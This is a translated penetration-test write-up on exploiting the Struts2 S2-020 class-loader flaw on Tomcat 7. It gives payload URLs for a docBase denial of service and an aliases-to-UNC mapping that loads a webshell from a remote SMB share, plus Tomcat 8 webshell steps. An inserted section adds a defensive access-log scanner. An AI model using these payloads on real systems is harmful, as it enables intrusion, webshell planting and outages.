2025-01-24 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
In this issue, the editor explains how the Struts2-020 vulnerability can be exploited when the middleware is Tomcat 7 in a cloud environment. The article is rich in content and analyses the problem from a professional point of view; I hope you get something out of it.
During a simulated attack on a client (Party A), a website vulnerable to Struts2-020 was found, but because the middleware was Tomcat 7 it was not possible to get a shell from it directly.
First, the principle of the Struts2-020 vulnerability
Object is the base class in Java, and every object created from a class inherits all the properties and methods of Object. So whatever the code of the current Action is, it always has the getClass method inherited from Object, which returns a Class object, and that Class object always has a getClassLoader method; in the end the class loader can be reached through every Action. Struts2-020 allows a request parameter named "class", which maps directly to the "getClass()" method, and through it the ClassLoader of the application server in use can be manipulated. In short, some configuration properties of Tomcat can be changed through the ClassLoader, and under Tomcat 8 this vulnerability can be used to get a shell. The following figure shows some of the controllable properties of Tomcat 8.
There are many write-ups online on how to get a shell on Tomcat 8, so it is not demonstrated here; the general steps are as follows:
1. Change the Tomcat log into an executable file: change the log file name and change the log path to the web directory
2. Initialize the log file
3. Write a one-line webshell into the log through a URL access
4. Connect to the one-line webshell with the Chopper (Caidao) client; getshell succeeds
Second, how to get a shell on Tomcat 7?
At first I thought that Struts2-020 could also be used to get a shell under Tomcat 7, but after frantic attempts it failed. Only after searching Baidu did I learn that the log attributes cannot be controlled on Tomcat 7; only the web directory can be redirected, which causes a denial of service.
Denial of service attack:
http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=<any value>
But a denial-of-service finding alone cannot be handed over to Party A; if Party A cannot hand in the job the boss is unhappy, and if the boss is unhappy my performance appraisal is in danger. And a denial-of-service attack is something I dare not even launch: the last simulated attack paralysed Party A's service, and the last outsourcing firm let me go because of it.
2.1 Tedious local debugging
With no other option, I could only enumerate all the controllable properties in a locally built test environment.
I tried each attribute to see whether it could be used. After changing the attribute values one by one and judging by the logs and the resulting changes, I found that none of them got me a shell. Just as I was about to give up, a red figure floated through my mind and kindly told me that there is no unbreakable system, only hackers who do not work hard enough. Instantly full of fighting spirit!
2.2 Google to the rescue
Google, as a good friend of technicians, is the right place to go when you hit a technical problem. A search turned up an article by Lao Mao stating that class.classLoader.parent.resources.dirContext.aliases can not only be used to read arbitrary files, but that the file path also supports UNC paths, that is, SMB paths. At this point I thought: since SMB paths are supported, could I execute commands once a file share is reached? As long as the share is set to Everyone so that anyone can access it, the website can read the executable file, and maybe it can be executed!
2.3 Build an SMB service locally and test
The setup is not difficult: put a one-line webshell (Trojan) in the file share, then map the website's alias path to the SMB server.
Payload:
http://127.0.0.1:8080/struts2-blank/hello.action?class.classLoader.parent.resources.dirContext.aliases=\\192.168.1.1\muma.jsp
Chopper connected successfully:
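From the defender's side, the parameter names used above (the docBase redirect in section 2 and the aliases-to-UNC mapping in section 2.3) are very visible in web server access logs, because the whole attack travels in the query string. The scanner below is an added example written for this article, not code from the original post: it parses Combined Log Format lines, URL-decodes the query parameters, and flags any parameter that reaches the ClassLoader through the "class" property, labelling what it is trying to change. The log lines are constructed for the example, and the matching is case-insensitive so a capitalised prefix does not slip past it.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Prefix of the Common/Combined Log Format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3})'
)

# A parameter whose name starts with class.classLoader is walking from getClass()
# into the application server's class loader, which no legitimate form does.
CLASSLOADER_RE = re.compile(r'^class\.classloader\b', re.IGNORECASE)

# UNC form \\host\share\... (or the forward-slash spelling //host/share/...).
UNC_RE = re.compile(r'^(\\\\|//)[^\\/]+[\\/]')


def classify(name, value):
    """Short label for what a ClassLoader-reaching parameter is trying to do."""
    lname = name.lower()
    if lname.endswith('.dircontext.docbase'):
        return 'docBase redirect (denial of service on Tomcat 7)'
    if lname.endswith('.dircontext.aliases') and UNC_RE.match(value):
        return 'aliases mapped to a UNC path (remote share served as web content)'
    if lname.endswith('.dircontext.aliases'):
        return 'aliases remapped (arbitrary file read)'
    return 'other ClassLoader property manipulation'


def scan_line(line):
    """Return a list of findings (possibly empty) for one access log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group('target'))
    findings = []
    # parse_qsl percent-decodes names and values; keep_blank_values keeps
    # probes such as "class.classLoader.x=" that carry no value.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if CLASSLOADER_RE.match(name):
            findings.append({
                'client': m.group('client'),
                'time': m.group('ts'),
                'path': parts.path,
                'param': name,
                'value': value,
                'label': classify(name, value),
            })
    return findings


def scan(lines):
    """Scan an iterable of access log lines and return all findings."""
    return [f for line in lines for f in scan_line(line)]


# Constructed sample log: one benign hit, the two request shapes from this article
# (the UNC path percent-encoded as a browser would send it), and a benign "class" form field.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/May/2014:10:12:01 +0800] "GET /struts2-blank/hello.action HTTP/1.1" 200 512',
    '10.0.0.9 - - [31/May/2014:10:12:07 +0800] "GET /s/example/HelloWorld.action'
    '?class.classLoader.resources.dirContext.docBase=x HTTP/1.1" 200 88',
    '10.0.0.9 - - [31/May/2014:10:12:20 +0800] "GET /struts2-blank/hello.action'
    '?Class.classLoader.parent.resources.dirContext.aliases=%5C%5C192.168.1.1%5Cmuma.jsp HTTP/1.1" 200 88',
    '10.0.0.12 - - [31/May/2014:10:13:02 +0800] "GET /search.action?class=economy&q=tickets HTTP/1.1" 200 2048',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['path']} -> {f['label']}: {f['param']}={f['value']}")
```

Running the block reports the docBase and aliases requests from 10.0.0.9 and nothing for the two benign lines. A plain "class" form field is deliberately not flagged: only names that continue into classLoader are a manipulation attempt, which keeps the rule quiet on ordinary applications while still catching both the Tomcat 7 and Tomcat 8 variants, since every one of them starts from the same prefix.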
Third, cloud environment testing
Because the target is in a cloud environment, and it is well known that most cloud providers do not expose port 445 to the public, this looked hopeless. However, information gathering showed that the target was hosted by a small, low-grade cloud provider. I had dealt with several such providers before, and on their networks port 445 was reachable between hosts in the same C segment (/24). Would this provider have the same configuration flaw?
3.1 The power of money
I originally wanted to compromise a server in the C segment to use as the SMB server, but as a white hat of justice, how could I do such a nasty thing? The only option was to write up a plan and submit it to my superiors for funding. In the end, using the justification that we needed an IP adjacent to the target's, customer service sold us the server next to the target at 1.5 times the price, and it turned out the misconfiguration really existed: port 445 was reachable across the C segment, and getshell succeeded.
Website penetration rarely succeeds with a POC or EXP straight away; when you run into problems, think more and search more.
This is how the editor shares the way Struts2-020 can be exploited on Tomcat 7 in a cloud environment. If you happen to have similar doubts, refer to the analysis above. If you want to know more, you are welcome to follow the industry information channel.